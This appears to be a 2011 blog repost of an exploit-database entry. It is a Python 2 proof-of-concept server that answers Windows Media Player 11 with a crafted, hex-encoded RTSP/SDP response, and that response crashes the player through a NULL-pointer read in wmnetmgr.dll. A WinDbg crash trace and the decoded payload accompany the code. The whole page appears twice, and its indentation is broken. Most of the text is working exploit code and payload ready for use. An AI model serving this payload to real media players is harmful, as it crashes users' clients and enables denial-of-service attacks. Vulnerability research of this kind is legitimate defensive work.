Sunday, December 25, 2011

[dos / poc] - Windows Media Player v11.0.5721.5262 Remote Denial Of Service

# Python 2 proof-of-concept server (print statements, str-based sockets).
# It listens on TCP 554 and answers every accepted connection with one fixed,
# pre-encoded RTSP/SDP response; the crash trace and the decoded response are
# reproduced in the comments that follow the code.
# NOTE(review): this paste has lost its indentation (every line carries one
# leading space and the `while True` body is not indented), so the exact loop
# extent -- in particular whether `s.close()` sits inside or after the loop --
# cannot be recovered from the text; read it as a record of the payload rather
# than as runnable code.
# Impact, as far as the trace below shows: ecx is 0 at the faulting
# `mov edi,dword ptr [ecx+114h]` in wmnetmgr.dll, i.e. a NULL-pointer read that
# crashes the client (denial of service). eip sits inside wmnetmgr in both
# chances; nothing on this page shows control of eip or a write primitive.
# Defensive framing: the trigger is the *server* side of an RTSP exchange, so
# this is a client-side bug reachable from a malicious or compromised
# streaming server the player is pointed at.
import socket, binascii
 print "\n" 
 print "----------------------------------------------------------------"
 print "|      WMP11 Remote Null Pointer                                |"
 print "|      Level, Smash the Stack                                   |"
 print "|      Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |"
 print "|      Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262  |"
 print "----------------------------------------------------------------"
 print "\n"
 # The mms:// address the player under test is pointed at; 554 below is the
 # RTSP port this script expects the player to connect to for it.
 print "Attack URL: mms://127.0.0.1/Sample_Broadcast\n\n"
 # Loopback only: the player under test runs on the same host as this script.
 HOST = "127.0.0.1"
 PORT = 554
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.bind((HOST, PORT))
 # Backlog of one: connections are handled strictly one at a time below.
 s.listen(1)
 # Single-element list holding the hex encoding of the whole response (status
 # line, headers, blank line, SDP body). The decoded text is in the #PAYLOAD#
 # comment further down. Note that in the hex the SDP lines "v=0" / "o=-" and
 # "s=<No Title>" / "c=IN IP4 ..." are NOT separated by CRLF, exactly as the
 # decoded comment shows them run together.
 buf = [
 ("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746"
 "96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643"
 "a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683"
 "a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474"
 "d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310"
 "d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206"
 "36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7"
 "76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636"
 "f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726"
 "f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205"
 "361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363"
 "8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7"
 "3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7"
 "26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0"
 "d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393"
 "1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494"
 "e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746"
 "96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7"
 "a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707"
 "a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414"
 "1414141414c784141414141414141414141414141414141414141664141414141414141414843677"
 "7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414"
 "26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414"
 "141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707"
 "a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415"
 "83178454b7742582b794256573838527150304167463963524373414141414141414141414177414"
 "1414141414141414151414141414141514145414150414141414141414141416b516663743765707"
 "a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415"
 "83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414"
 "1414149414141414167414141414141595145424145416641414151414141414151415141416f414"
 "143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676"
 "c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316"
 "a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414"
 "141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414"
 "1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7"
 "43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0"
 "a0d0a")
 ]
 # Serve connections forever; every client gets the same canned response.
 while True:
 conn, addr = s.accept()
 print "-----Request From Client-----\n"
 # At most one 1024-byte chunk of the client's request is read and echoed;
 # the request is never parsed and anything beyond that chunk is not consumed.
 print conn.recv(1024)
 print "-----Request From Client-----\n"
 print "-----Response From Server-----\n"
 print binascii.unhexlify(buf[0])
 print "-----Response From Server-----\n"
 # send() may deliver fewer bytes than given; its return value is not checked.
 conn.send(binascii.unhexlify(buf[0]))
 conn.close()
 # Never reached if it follows (or is inside) the unconditional `while True`
 # -- TODO confirm against the original indentation.
 s.close()
  
 #CRASH
 #(ae8.5b8): Access violation - code c0000005 (first chance)
 #First chance exceptions are reported before any exception handling.
 #This exception may be expected and handled.
 #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
 #cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
 #*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll -
 #wmnetmgr!DllUnregisterServer+0x76320:
 #128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????
 #0:021> g
 #(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!)
 #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
 #cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
 #wmnetmgr!DllUnregisterServer+0x76320:
 #128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????
  
 #PAYLOAD#
 #RTSP/1.0 208 OK
 #Content-Type: application/sdp
 #Vary: Accept
 #X-Playlist-Gen-Id: 176
 #X-Broadcast-Id: 0
 #Content-Length: 879
 #Date: Sun, 08 May 2011 15:24:33 GMT
 #CSeq: 1
 #Server: WMServer/9.1.1.3841
 #Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile
 #Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT
 #Etag: "168"
 #Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split
 #v=0o=- 201105081439130406 201105081439130406 IN IP4 127.0.0.1
 #s=<No Title>c=IN IP4 0.0.0.0b=RR:0a=pgmpu:data:application/vnd.ms.wms-hdr.asfv1;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC
 #BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM
 #nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq
 #nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y
 #BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC
 #BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg
 #AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA
 #AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA
 #A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable
 
 
 
  # 1337day.com [2011-12-24]
# Python 2 proof-of-concept server (print statements, str-based sockets).
# It listens on TCP 554 and answers every accepted connection with one fixed,
# pre-encoded RTSP/SDP response; the crash trace and the decoded response are
# reproduced in the comments that follow the code.
# NOTE(review): this paste has lost its indentation (every line carries one
# leading space and the `while True` body is not indented), so the exact loop
# extent -- in particular whether `s.close()` sits inside or after the loop --
# cannot be recovered from the text; read it as a record of the payload rather
# than as runnable code.
# Impact, as far as the trace below shows: ecx is 0 at the faulting
# `mov edi,dword ptr [ecx+114h]` in wmnetmgr.dll, i.e. a NULL-pointer read that
# crashes the client (denial of service). eip sits inside wmnetmgr in both
# chances; nothing on this page shows control of eip or a write primitive.
# Defensive framing: the trigger is the *server* side of an RTSP exchange, so
# this is a client-side bug reachable from a malicious or compromised
# streaming server the player is pointed at.
import socket, binascii
 print "\n" 
 print "----------------------------------------------------------------"
 print "|      WMP11 Remote Null Pointer                                |"
 print "|      Level, Smash the Stack                                   |"
 print "|      Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |"
 print "|      Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262  |"
 print "----------------------------------------------------------------"
 print "\n"
 # The mms:// address the player under test is pointed at; 554 below is the
 # RTSP port this script expects the player to connect to for it.
 print "Attack URL: mms://127.0.0.1/Sample_Broadcast\n\n"
 # Loopback only: the player under test runs on the same host as this script.
 HOST = "127.0.0.1"
 PORT = 554
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.bind((HOST, PORT))
 # Backlog of one: connections are handled strictly one at a time below.
 s.listen(1)
 # Single-element list holding the hex encoding of the whole response (status
 # line, headers, blank line, SDP body). The decoded text is in the #PAYLOAD#
 # comment further down. Note that in the hex the SDP lines "v=0" / "o=-" and
 # "s=<No Title>" / "c=IN IP4 ..." are NOT separated by CRLF, exactly as the
 # decoded comment shows them run together.
 buf = [
 ("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746"
 "96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643"
 "a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683"
 "a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474"
 "d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310"
 "d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206"
 "36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7"
 "76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636"
 "f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726"
 "f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205"
 "361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363"
 "8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7"
 "3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7"
 "26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0"
 "d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393"
 "1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494"
 "e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746"
 "96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7"
 "a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707"
 "a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414"
 "1414141414c784141414141414141414141414141414141414141664141414141414141414843677"
 "7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414"
 "26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414"
 "141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707"
 "a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415"
 "83178454b7742582b794256573838527150304167463963524373414141414141414141414177414"
 "1414141414141414151414141414141514145414150414141414141414141416b516663743765707"
 "a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415"
 "83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414"
 "1414149414141414167414141414141595145424145416641414151414141414151415141416f414"
 "143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676"
 "c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316"
 "a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414"
 "141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414"
 "1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7"
 "43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0"
 "a0d0a")
 ]
 # Serve connections forever; every client gets the same canned response.
 while True:
 conn, addr = s.accept()
 print "-----Request From Client-----\n"
 # At most one 1024-byte chunk of the client's request is read and echoed;
 # the request is never parsed and anything beyond that chunk is not consumed.
 print conn.recv(1024)
 print "-----Request From Client-----\n"
 print "-----Response From Server-----\n"
 print binascii.unhexlify(buf[0])
 print "-----Response From Server-----\n"
 # send() may deliver fewer bytes than given; its return value is not checked.
 conn.send(binascii.unhexlify(buf[0]))
 conn.close()
 # Never reached if it follows (or is inside) the unconditional `while True`
 # -- TODO confirm against the original indentation.
 s.close()
  
 #CRASH
 #(ae8.5b8): Access violation - code c0000005 (first chance)
 #First chance exceptions are reported before any exception handling.
 #This exception may be expected and handled.
 #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
 #cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
 #*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll -
 #wmnetmgr!DllUnregisterServer+0x76320:
 #128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????
 #0:021> g
 #(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!)
 #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
 #cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
 #wmnetmgr!DllUnregisterServer+0x76320:
 #128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????
  
 #PAYLOAD#
 #RTSP/1.0 208 OK
 #Content-Type: application/sdp
 #Vary: Accept
 #X-Playlist-Gen-Id: 176
 #X-Broadcast-Id: 0
 #Content-Length: 879
 #Date: Sun, 08 May 2011 15:24:33 GMT
 #CSeq: 1
 #Server: WMServer/9.1.1.3841
 #Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile
 #Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT
 #Etag: "168"
 #Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split
 #v=0o=- 201105081439130406 201105081439130406 IN IP4 127.0.0.1
 #s=<No Title>c=IN IP4 0.0.0.0b=RR:0a=pgmpu:data:application/vnd.ms.wms-hdr.asfv1;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC
 #BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM
 #nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq
 #nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y
 #BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC
 #BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg
 #AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA
 #AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA
 #A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable
 
 
 
  # 1337day.com [2011-12-24]

Source: http://www.1337day.com/exploits/17302

